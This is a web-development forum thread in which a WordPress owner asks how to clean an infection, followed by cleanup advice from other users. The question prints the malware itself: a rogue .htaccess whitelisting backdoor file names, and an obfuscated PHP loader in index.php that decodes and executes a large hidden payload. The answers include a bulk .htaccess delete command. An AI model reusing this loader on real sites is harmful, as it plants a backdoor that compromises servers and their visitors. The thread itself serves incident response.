Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
E
E
Enlik Farhat2021-08-04 08:05:33
WordPress
Enlik Farhat, 2021-08-04 08:05:33

The virus generates htaccess and infects a wordpress site. How to fix?

Good afternoon, there is a site on wordpress, it has a virus that generates htaccess files in all folders and changes the index.php code. Can't identify infection

<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>


<?php $RZXiMOEbYmVH='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$RZXiMOEbYmVH[(105/15)].$RZXiMOEbYmVH[(26-1)].$RZXiMOEbYmVH[(1*49)].$RZXiMOEbYmVH[((10*1)+18)].$RZXiMOEbYmVH[(14+22)].$RZXiMOEbYmVH[(44+5)].$RZXiMOEbYmVH[(44-13)].$RZXiMOEbYmVH[(684/18)].$RZXiMOEbYmVH[(23+4)].$RZXiMOEbYmVH[(72-(33-7))].$RZXiMOEbYmVH[(154/22)].$RZXiMOEbYmVH[(11+25)].$RZXiMOEbYmVH[(65-(62-31))].$RZXiMOEbYmVH[(26-6)].$RZXiMOEbYmVH[((27*2)-8)];$pHFdNhg9688=$RZXiMOEbYmVH[(20-9)].$RZXiMOEbYmVH[(2*4)].$RZXiMOEbYmVH[(29*1)].$RZXiMOEbYmVH[(160/4)];$MYtraky2482=$RZXiMOEbYmVH[(8*5)].$RZXiMOEbYmVH[((1+0)+2)].$RZXiMOEbYmVH[(6+(1*(95/19)))].$RZXiMOEbYmVH[(140/5)].$RZXiMOEbYmVH[(522/18)].$RZXiMOEbYmVH[(7*((7-3)-2))].$RZXiMOEbYmVH[(2*14)].$RZXiMOEbYmVH[(138/(2+4))].$RZXiMOEbYmVH[(1029/(378/18))].$RZXiMOEbYmVH[((2*189)/9)].$RZXiMOEbYmVH[(12+(0+0))].$RZXiMOEbYmVH[(31*1)].$RZXiMOEbYmVH[(48/(36/12))].$RZXiMOEbYmVH[(735/15)].$RZXiMOEbYmVH[(0+7)].$RZXiMOEbYmVH[(18+2)].$RZXiMOEbYmVH[(18-(10/5))].$RZXiMOEbYmVH[(735/15)].$RZXiMOEbYmVH[(0+(2-(1*1)))].$RZXiMOEbYmVH[(16-(3+(36/(0+18))))].$RZXiMOEbYmVH[((167-23)/18)].$RZXiMOEbYmVH[(0+(18-9))].$RZXiMOEbYmVH[(1*3)].$RZXiMOEbYmVH[(11*(1+(0/(78/13))))].$RZXiMOEbYmVH[(2*7)].$RZXiMOEbYmVH[(29*(0+1))].$RZXiMOEbYmVH[(38-(8+9))].$RZXiMOEbYmVH[(15*2)].$RZXiMOEbYmVH[(45-11)].$RZXiMOEbYmVH[(1*46)].$RZXiMOEbYmVH[(1*(17+21))].$RZXiMOEbYmVH[(78/3)].$RZXiMOEbYmVH[(21+(77/11))].$RZXiMOEbYmVH[(22+14)].$RZXiMOEbYmVH[(343/(91/13))].$RZXiMOEbYmVH[(1*1)].$RZXiMOEbYmVH[(21-10)].$RZXiMOEbYmVH[(22+(12/2))].$RZXiMOEbYmVH[(180/20)].$RZXiMOEbYmVH[(3+((0+0)*1))].$RZXiMOEbYmVH[(686/(126/9))].$RZXiMOEbYmVH[(61-(32-8))].$RZXiMOEbYmVH[(476/17)].$RZXiMOEbYmVH[((4-0)+22)].$RZXiMOEbYmVH[(((23-(2*5))/13)-0)].$RZXiMOEbYmVH[(7+(84/21))].$RZXiMOEbYmVH[(28/2)].$RZXiMOEbYmVH[(9-0)].$RZXiMOEbYmVH[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>
<?php
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

3 answer(s)
Report
Z
Zettabyte, 2021-08-04
@AlisherBekenov

generates htaccess files in all folders

You can delete them via SSH using the command below, just correct the path to your own and make sure that you don’t delete the required htaccess(s):
find /home/.../papka_saita -type f -name ".htaccess" -delete

Here is a decryption of the obfuscated code, study it, maybe it will help you figure it out: https://pastebin.com/C4dk2WAX
But in a good way, the advice above is correct - delete the stolen goods, re-upload the site, update the existing one, double-check the rest.

Report
A
Artem Zolin, 2021-08-04
@artzolin

  1. Remove null (pirated) plugins and themes
  2. Clean up the base
  3. Re-upload core, theme and plugin files
  4. If the theme is self-written, sort through the files with your hands for the presence of someone else's code in it

Report
Y
Yaroslav Alexandrov, 2021-08-04
@alexyarik

Already answered several times, here is a checklist for you
How to remove a virus on a Wordpress site?
site recovery method:
Hacked wordpress site, how to find and close holes?

Similar questions
R
Roman2019-08-30 11:51:57
Is there a real alternative to Upwork? 7Reply
L
LastGeneral2022-02-18 14:16:38
How to buy gift certificates online? 2Reply
M
Michael2019-01-23 17:56:49
How can some PHP functions be done for a single site? 2Reply
A
Alexander Ivanov2016-08-23 09:44:56
How to implement scrolling slider on OWL? 3Reply
X
xtelekom2016-08-29 09:42:16
Is this behavior normal for Yandex? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question